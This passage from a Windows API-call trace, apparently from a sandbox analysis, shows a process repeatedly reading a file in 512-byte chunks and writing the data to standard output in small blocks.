(_FileHandle=1) returned 0x50 [0223.425] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.425] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.425] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.425] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.425] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] GetFileType (hFile=0x50) returned 0x1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] GetFileType (hFile=0x50) returned 0x1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] GetFileType (hFile=0x50) returned 0x1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] GetFileType (hFile=0x50) returned 0x1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] GetFileType (hFile=0x50) returned 0x1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] GetFileType (hFile=0x50) returned 0x1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] GetFileType (hFile=0x50) returned 0x1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] GetFileType (hFile=0x50) returned 0x1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.427] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.427] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.427] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.427] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] GetFileType (hFile=0x50) returned 0x1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] GetFileType (hFile=0x50) returned 0x1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] GetFileType (hFile=0x50) returned 0x1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] GetFileType (hFile=0x50) returned 0x1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] GetFileType (hFile=0x50) returned 0x1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] GetFileType (hFile=0x50) returned 0x1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] GetFileType (hFile=0x50) returned 0x1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] GetFileType (hFile=0x50) returned 0x1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.428] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.428] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.428] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.428] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] GetFileType (hFile=0x50) returned 0x1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] GetFileType (hFile=0x50) returned 0x1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] GetFileType (hFile=0x50) returned 0x1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] GetFileType (hFile=0x50) returned 0x1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] GetFileType (hFile=0x50) returned 0x1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] GetFileType (hFile=0x50) returned 0x1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] GetFileType (hFile=0x50) returned 0x1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] GetFileType (hFile=0x50) returned 0x1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.430] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.430] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.430] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.430] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] GetFileType (hFile=0x50) returned 0x1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] GetFileType (hFile=0x50) returned 0x1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] GetFileType (hFile=0x50) returned 0x1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] GetFileType (hFile=0x50) returned 0x1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] GetFileType (hFile=0x50) returned 0x1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] GetFileType (hFile=0x50) returned 0x1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] GetFileType (hFile=0x50) returned 0x1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] GetFileType (hFile=0x50) returned 0x1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.432] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.432] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.432] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.432] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] GetFileType (hFile=0x50) returned 0x1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] GetFileType (hFile=0x50) returned 0x1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] GetFileType (hFile=0x50) returned 0x1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] GetFileType (hFile=0x50) returned 0x1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] GetFileType (hFile=0x50) returned 0x1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] GetFileType (hFile=0x50) returned 0x1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] GetFileType (hFile=0x50) returned 0x1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] GetFileType (hFile=0x50) returned 0x1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.433] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.433] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.433] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.433] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] GetFileType (hFile=0x50) returned 0x1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] GetFileType (hFile=0x50) returned 0x1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] GetFileType (hFile=0x50) returned 0x1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] GetFileType (hFile=0x50) returned 0x1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] GetFileType (hFile=0x50) returned 0x1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] GetFileType (hFile=0x50) returned 0x1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] GetFileType (hFile=0x50) returned 0x1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] GetFileType (hFile=0x50) returned 0x1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.435] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.435] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.435] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.436] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] GetFileType (hFile=0x50) returned 0x1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] GetFileType (hFile=0x50) returned 0x1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] GetFileType (hFile=0x50) returned 0x1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] GetFileType (hFile=0x50) returned 0x1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] GetFileType (hFile=0x50) returned 0x1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.437] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.437] GetFileType (hFile=0x50) returned 0x1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] GetFileType (hFile=0x50) returned 0x1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] GetFileType (hFile=0x50) returned 0x1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.438] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.438] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.438] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.438] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] GetFileType (hFile=0x50) returned 0x1 [0223.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.438] GetFileType (hFile=0x50) returned 0x1 [0223.438] _get_osfhandle 